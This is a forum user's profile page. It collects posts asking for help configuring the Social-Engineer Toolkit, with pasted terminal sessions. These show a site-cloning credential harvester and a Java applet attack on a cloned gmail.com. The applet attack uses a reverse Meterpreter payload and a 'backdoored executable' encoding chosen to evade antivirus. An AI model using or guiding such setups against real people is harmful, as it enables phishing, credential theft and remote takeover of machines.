Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Shinigami's Achievements


Newbie (1/14)

  1. I actually tried that, even tried reloading an older release via VMWARE snapshot. Doesn't help.
  2. 1) Web Templates 2) Site Cloner 3) Custom Import 99) Return to Webattack Menu set:webattack>2 [-] Credential harvester will allow you to utilize the clone capabilities within SET [-] to harvest credentials or parameters from a website as well as place them into a report [-] This option is used for what IP the server will POST to. [-] If you're using an external IP, use your external IP for this set:webattack> IP address for the POST back in Harvester/Tabnabbing:*********** [-] SET supports both HTTP and HTTPS [-] Example: http://www.thisisafakesite.com set:webattack> Enter the url to clone:https://*****.com [*] Cloning the website: https://*****.com [*] This could take a little bit... The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. [*] I have read the above message. [*] Press {return} to continue. [*] Social-Engineer Toolkit Credential Harvester Attack [*] Credential Harvester is running on port ***** [*] Information will be displayed to you as it arrives below: localhost - - [29/Jun/2012 13:39:44] "GET / HTTP/1.1" 200 - Problem is, the CLONED_SITE is BLANK. Locating the INDEX.HTML file in the WEB_CLONE folder, its BLANK. I'm not sure why this is happening. It worked perfect until yesterday. I deleted the PROGRAM_JUNK data, also reloaded an old Snapshot of SET, and I still have this issue. It DOES connects to the internet to clone the specified Site, but the cloned_site is just EMPTY/BLANK. I did try plenty of other sites to clone. They all take a while in cloning from the Internet, and smoothly proceeds with listening to incoming connections, but the Index is empty. Could it be a bug in the Update?
  3. Thank you! Very grateful for your response, very elaborate. Can you please explain the SECOND query I posted? Concerning the code where it asks if my Metasploit is running on the same IP or a different one. Should I use my Local IP here or Public again? Thanks again.
  4. Hi, before i pose my query, I would like to introduce myself. I'm a CEH and ECSA for quite some time now. However I'm still learning and today I was just curious in understanding the routing on how SET is connected to the MSF. Question: To make things simple I'm copying the lines from the Terminal and I'll point out what I'm referring to. Setting up JavaApplet in S.E.T: 1) Java Applet Attack Method set:webattack>1 2) Site Cloner set:webattack>2 [-] NAT/Port Forwarding can be used in the cases where your SET machine is [-] not externally exposed and may be a different IP address than your reverse listener. set> Are you using NAT/Port Forwarding [yes|no]: y #####set:webattack> IP address to SET web server (this could be your external IP or hostname):***.***.***.***###### #####set:webattack> Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]:n####### [-] SET supports both HTTP and HTTPS [-] Example: http://www.thisisafakesite.com set:webattack> Enter the url to clone:https://gmail.com [*] Cloning the website: https://gmail.com [*] Malicious java applet website prepped for deployment What payload do you want to generate: Name: Description: 1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker 2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker set:payloads>2 Below is a list of encodings to try and bypass AV. Select one of the below, 'backdoored executable' is typically the best. 1) avoid_utf8_tolower (Normal) 16) Backdoored Executable (BEST) set:encoding>16 #####set:payloads> PORT of the listener [443]:##### [*] Generating x64-based powershell injection code... FIRST: The first HASHED line of code, "(this could be your external IP or hostname)". Can I use no-ip or other DNS instead of an IP Address here? For I have a Dynamic IP issue here. Since SET uses the IP to bind it to a HANDLER, where there is only REVERSE_TCP and no TCP_DNS. SECOND: The Second line of code following, I seriously don't understand this. If I put in a Local Static IP address in this field (after choosing 'yes'), would that make a difference? What would be the 'Correct' option if I were to practice this over the Internet? Would I use the PUBLIC-IP/DNS just like I used it for the option Before this one? & why would it ask for my HANDLER's IP when it generates its own Handler? Please elaborate this option thank you. THIRD: The last HASHED line that asks for a PORT, if I'm not wrong, this is the HANDLER's port? LASTLY: I configured the SET_CONFIG to use a specific WEB_PORT, say '5555', but when this JavaAppletServer initializes, it speaks on 8080 and 8081. So how do I run CredentialHarvester along side when they both are on different ports? Thankyou
  • Create New...